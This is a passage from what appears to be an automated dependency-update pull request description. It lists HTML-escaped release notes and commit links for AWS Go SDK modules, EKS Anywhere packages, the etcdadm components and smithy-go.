cost for generative artificial intelligence (AI) models.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/securityhub\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/securityhub/CHANGELOG.md#v1310-2023-05-04\"\u003ev1.31.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add support for Finding History.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/sqs\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/sqs/CHANGELOG.md#v1210-2023-05-04\"\u003ev1.21.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release enables customers to call SQS using AWS JSON-1.0 protocol.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2023-05-03)\u003c/h1\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/appsync\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/appsync/CHANGELOG.md#v1200-2023-05-03\"\u003ev1.20.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Private API support for AWS AppSync. With Private APIs, you can now create GraphQL APIs that can only be accessed from your Amazon Virtual Private Cloud (\u0026quot;VPC\u0026quot;).\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/ec2\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/ec2/CHANGELOG.md#v1960-2023-05-03\"\u003ev1.96.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Adds an SDK paginator for GetNetworkInsightsAccessScopeAnalysisFindings\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/inspector2\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/inspector2/CHANGELOG.md#v1120-2023-05-03\"\u003ev1.12.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This feature provides deep inspection for linux based instance\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/iottwinmaker\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/iottwinmaker/CHANGELOG.md#v1120-2023-05-03\"\u003ev1.12.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds a field for GetScene API to return error code and message from dependency services.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/networkfirewall\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/networkfirewall/CHANGELOG.md#v1270-2023-05-03\"\u003ev1.27.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: AWS Network Firewall now supports policy level HOME_NET variable overrides.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/opensearch\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/opensearch/CHANGELOG.md#v1160-2023-05-03\"\u003ev1.16.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Amazon OpenSearch Service adds the option to deploy a domain across multiple Availability Zones, with each AZ containing a complete copy of data and with nodes in one AZ acting as a standby. This option provides 99.99% availability and consistent performance in the event of infrastructure failure.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/wellarchitected\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/wellarchitected/CHANGELOG.md#v1200-2023-05-03\"\u003ev1.20.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release deepens integration with AWS Service Catalog AppRegistry to improve workload resource discovery.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2023-05-02)\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ae835ecd4db83e5aff241520ec643afba522d704\"\u003e\u003ccode\u003eae835ec\u003c/code\u003e\u003c/a\u003e Release 2023-05-04\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ef7f367760339dbf8f4bb7c81dbb86b1561b3a9e\"\u003e\u003ccode\u003eef7f367\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/a62e494fe82709dd82ae4ce6d5a5a6a45287c45a\"\u003e\u003ccode\u003ea62e494\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/833592fbe1a37f1cfd8b7b7062473c7cc6a97859\"\u003e\u003ccode\u003e833592f\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/829131feddac6a2fa54ea0050ed7d8c97a29cdd7\"\u003e\u003ccode\u003e829131f\u003c/code\u003e\u003c/a\u003e Add SQSCustomizations (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/2108\"\u003e#2108\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9d08e7dc2f051ac9c83deca2c548c1d4c3373cdb\"\u003e\u003ccode\u003e9d08e7d\u003c/code\u003e\u003c/a\u003e Release 2023-05-03\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/cec4d55d05fbd0bddff916f426901097073068a6\"\u003e\u003ccode\u003ecec4d55\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f558c81e77f42988da4fe0d0aee4be0294a50a8b\"\u003e\u003ccode\u003ef558c81\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/8d2e554da1d221c2c1a541a78c729a3f564e8849\"\u003e\u003ccode\u003e8d2e554\u003c/code\u003e\u003c/a\u003e Release 2023-05-02\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/312e442dc8e12c6cb311e8ac5fcb5560eb4bcee1\"\u003e\u003ccode\u003e312e442\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.15.3...config/v1.18.23\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/ec2` from 1.167.1 to 1.301.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e5c93f424528436a368e9ba357814f744130add0\"\u003e\u003ccode\u003ee5c93f4\u003c/code\u003e\u003c/a\u003e Release 2026-05-07\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/33e133f4f141e743592571ef6f1eba8de7a46e57\"\u003e\u003ccode\u003e33e133f\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6407448fca2964df58514c64f7fc5cf3d7a9c91e\"\u003e\u003ccode\u003e6407448\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5c061151aa35d815397875ee47d78353b8b4fcf1\"\u003e\u003ccode\u003e5c06115\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/84ddd08980744ac0f3bacfe7d2796c861671accc\"\u003e\u003ccode\u003e84ddd08\u003c/code\u003e\u003c/a\u003e Release 2026-05-06\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/23645b402c11575a32d1af93ec237f2f121dd285\"\u003e\u003ccode\u003e23645b4\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/848eb597bd63cb770bcd11ee230f9dca68ce1ffe\"\u003e\u003ccode\u003e848eb59\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/1d7b13420ed32f0809a5a4a35c630d19bfd0b6d4\"\u003e\u003ccode\u003e1d7b134\u003c/code\u003e\u003c/a\u003e Release 2026-05-05\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5bbbc97fcab2086757060561ccd1f34101ba7b57\"\u003e\u003ccode\u003e5bbbc97\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/8dbb93618325675f55eb0c3eb0c7a766806dadbc\"\u003e\u003ccode\u003e8dbb936\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/ec2/v1.167.1...service/ec2/v1.301.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/ecr` from 1.27.4 to 1.57.2\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9bd153c05150d0c3f9d45f5b9353c34df9bab5b5\"\u003e\u003ccode\u003e9bd153c\u003c/code\u003e\u003c/a\u003e Release 2025-03-04.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b967446708e597c3c22c658d8399d11accc9e1f1\"\u003e\u003ccode\u003eb967446\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/188c52a1f53d95e7f99ce0edc73059ce5d0b803c\"\u003e\u003ccode\u003e188c52a\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/defaf5c13afed6bb77e2ee4fafea2bfcd09cea88\"\u003e\u003ccode\u003edefaf5c\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/8f2dd23c2630bd2ee667a403cf8ea8611c5ce406\"\u003e\u003ccode\u003e8f2dd23\u003c/code\u003e\u003c/a\u003e add test that verifies SRA order of operations (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3025\"\u003e#3025\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3d547b010751de5a834a749ffdaddff4bcb0d39c\"\u003e\u003ccode\u003e3d547b0\u003c/code\u003e\u003c/a\u003e Release 2025-03-04\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/554a1497dc16d385e62514b10bc8adacfbd6a8d0\"\u003e\u003ccode\u003e554a149\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3abb221732b42d61c95f5306f528cc2182d37c7a\"\u003e\u003ccode\u003e3abb221\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/95ae39d57f8d986f691754737311102335039848\"\u003e\u003ccode\u003e95ae39d\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/c62ec38df6cc8e66ecf014365d8bd15c2599bc6d\"\u003e\u003ccode\u003ec62ec38\u003c/code\u003e\u003c/a\u003e create kitchen sink test service (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3023\"\u003e#3023\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.27.4...service/ssm/v1.57.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/eks-anywhere-packages` from 0.4.5 to 0.4.15\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/eks-anywhere-packages/releases\"\u003egithub.com/aws/eks-anywhere-packages's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.14.0\u003c/h2\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd registry mirror support for curated packages\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eCLI\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eNew Command: \u003ccode\u003eeksctl anywhere copy packages\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere/pull/4420\"\u003eaws/eks-anywhere#4420\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.13.0\u003c/h2\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for Create Namespace during package creation.\u003c/li\u003e\n\u003cli\u003eAdded Harbor support for import/download images command to EKS-A Packages.\u003c/li\u003e\n\u003cli\u003eFixed bug where PackageBundle version was incremented without changes sometimes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ePackages\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded Prometheus Package\u003c/li\u003e\n\u003cli\u003eAdded New Helm Chart CRD Package for Emissary for improved upgrade flow, and support multiple instances of the package.\u003c/li\u003e\n\u003cli\u003eUpdated Emissary Package to version 3.3.0\u003c/li\u003e\n\u003cli\u003eUpdated Metallb Package to version to 0.13.7\nUpdated ADOT Package to version 0.23.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.12.0\u003c/h2\u003e\n\u003ch2\u003eGeneral\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMoved to Go version 1.18\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd EKS Anywhere Packages support for remote management on workload clusters.\u003c/li\u003e\n\u003cli\u003eFixed Update Available not showing on PackageBundle list.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ePackages\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded New Helm Chart CRD Package for Metallb for improved upgrade flow\u003c/li\u003e\n\u003cli\u003eAdded Cert Manager Package\u003c/li\u003e\n\u003cli\u003eAdded AWS Distro for OpenTelemetry Package (ADOT)\u003c/li\u003e\n\u003cli\u003eAdded Metrics Server Package\u003c/li\u003e\n\u003cli\u003eAdded Cluster Autoscaler Package\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.11.0\u003c/h2\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded webhook to provide schema validation for packages\u003c/li\u003e\n\u003cli\u003eAdded support for gated packages\u003c/li\u003e\n\u003cli\u003eAdded active bundle validation for packagebundles\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eCLI\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSupport for configurations from \u003ccode\u003egenerate packages\u003c/code\u003e has been removed\u003c/li\u003e\n\u003cli\u003eSupport for gated packages\u003c/li\u003e\n\u003cli\u003eRemoved feature flag from curated packages installation\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ePackages\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded Emmisary package\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.10.0\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eController\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for configurations, and images in PackageBundle.\u003c/li\u003e\n\u003cli\u003eRemove registry from PackageBundle and updates sourceRegistry during cluster creation.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/afbcc9b196cf4d5988ddfb8f0133a2c1821821eb\"\u003e\u003ccode\u003eafbcc9b\u003c/code\u003e\u003c/a\u003e Faster retries during initial ecr credential injection (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1262\"\u003e#1262\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/01d4d5aff3e12dd6cc645cdb4126b8f2f5b8233c\"\u003e\u003ccode\u003e01d4d5a\u003c/code\u003e\u003c/a\u003e skip validation for package controller package (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1261\"\u003e#1261\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/317ca7eac8e949690a10dc6e8ec9e3b24f6a4a67\"\u003e\u003ccode\u003e317ca7e\u003c/code\u003e\u003c/a\u003e Revert pkg-ctlr cert private key rotation policy to Never (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1260\"\u003e#1260\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/b0bccf64eec3527271e4fa70616b39a6ff33b816\"\u003e\u003ccode\u003eb0bccf6\u003c/code\u003e\u003c/a\u003e Bump dev bundle to latest versions (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1259\"\u003e#1259\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/583ffe25a954c7b963108009cdcd24ff5cbf8047\"\u003e\u003ccode\u003e583ffe2\u003c/code\u003e\u003c/a\u003e Adds support for k8s 1.35 (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1258\"\u003e#1258\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/8c8da0328998e796b813e417ed5e720474802ff2\"\u003e\u003ccode\u003e8c8da03\u003c/code\u003e\u003c/a\u003e Update prod bundle for package release (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1257\"\u003e#1257\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/cfdc201fb58fc4c76b411a0ddeab291e82a4d0a3\"\u003e\u003ccode\u003ecfdc201\u003c/code\u003e\u003c/a\u003e fix adot regression (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1256\"\u003e#1256\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/aba2972a0d9bae8bdfc9eec8160b2d0eeef7c005\"\u003e\u003ccode\u003eaba2972\u003c/code\u003e\u003c/a\u003e Staging bundle with pkg ctlr fix (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1255\"\u003e#1255\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/47ceca1fb64f400921691bd097e482bd5b881746\"\u003e\u003ccode\u003e47ceca1\u003c/code\u003e\u003c/a\u003e fix imagePullSecret schema validation (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1254\"\u003e#1254\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/5c41ff81f07899eae8a27ed0cb629d28a96585f2\"\u003e\u003ccode\u003e5c41ff8\u003c/code\u003e\u003c/a\u003e Staging bundle with fixed packages (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1253\"\u003e#1253\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/eks-anywhere-packages/compare/v0.4.5...v0.4.15\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/etcdadm-bootstrap-provider` from 1.0.17 to 1.0.19\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/commit/a4b92b3f82826f1c85f473692d35e5311b04c7c4\"\u003e\u003ccode\u003ea4b92b3\u003c/code\u003e\u003c/a\u003e Bump cluster-api version (\u003ca href=\"https://redirect.github.com/aws/etcdadm-bootstrap-provider/issues/50\"\u003e#50\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/commit/2ee5467f5dc9940d86a4f1885e3f1612a8d1272e\"\u003e\u003ccode\u003e2ee5467\u003c/code\u003e\u003c/a\u003e Adds subbu vakati to owners (\u003ca href=\"https://redirect.github.com/aws/etcdadm-bootstrap-provider/issues/51\"\u003e#51\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/commit/e288bc1b6cd8867c52ae3da79bfb153913534f19\"\u003e\u003ccode\u003ee288bc1\u003c/code\u003e\u003c/a\u003e Add secure diagnostics endpoint with authentication to etcdadm bootstrap mana...\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/compare/v1.0.17...v1.0.19\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/etcdadm-controller` from 1.0.25 to 1.0.27\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-controller/commit/6795a4f86df4078f5258a25005028c6660fc36c8\"\u003e\u003ccode\u003e6795a4f\u003c/code\u003e\u003c/a\u003e Bump cluster-api version (\u003ca href=\"https://redirect.github.com/aws/etcdadm-controller/issues/75\"\u003e#75\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-controller/commit/72e7e5a190206423cea4519449b08a9c200971d4\"\u003e\u003ccode\u003e72e7e5a\u003c/code\u003e\u003c/a\u003e Adds subbu vakati to owners (\u003ca href=\"https://redirect.github.com/aws/etcdadm-controller/issues/74\"\u003e#74\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-controller/commit/d4476151cb03c0d699e5426632ff76a243ff0124\"\u003e\u003ccode\u003ed447615\u003c/code\u003e\u003c/a\u003e Add secure diagnostics endpoint with authentication to etcadm controller (\u003ca href=\"https://redirect.github.com/aws/etcdadm-controller/issues/73\"\u003e#73\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/etcdadm-controller/compare/v1.0.25...v1.0.27\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/smithy-go` from 1.20.3 to 1.25.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/smithy-go/releases\"\u003egithub.com/aws/smithy-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.25.0\u003c/h2\u003e\n\u003ch1\u003eRelease (2026-04-15)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.25.0\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add support for endpointBdd trait\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.22.4\u003c/h2\u003e\n\u003ch1\u003eRelease (2025-06-16)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.22.4\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBug Fix\u003c/strong\u003e: Fix CBOR serd empty check for string and enum fields\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.22.3\u003c/h2\u003e\n\u003ch1\u003eRelease (2025-02-17)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.22.3\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Bump minimum Go version to 1.22 per our language support policy.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-02-27)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Bump minimum go version to 1.24.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-02-20)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.24.1\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add new middleware 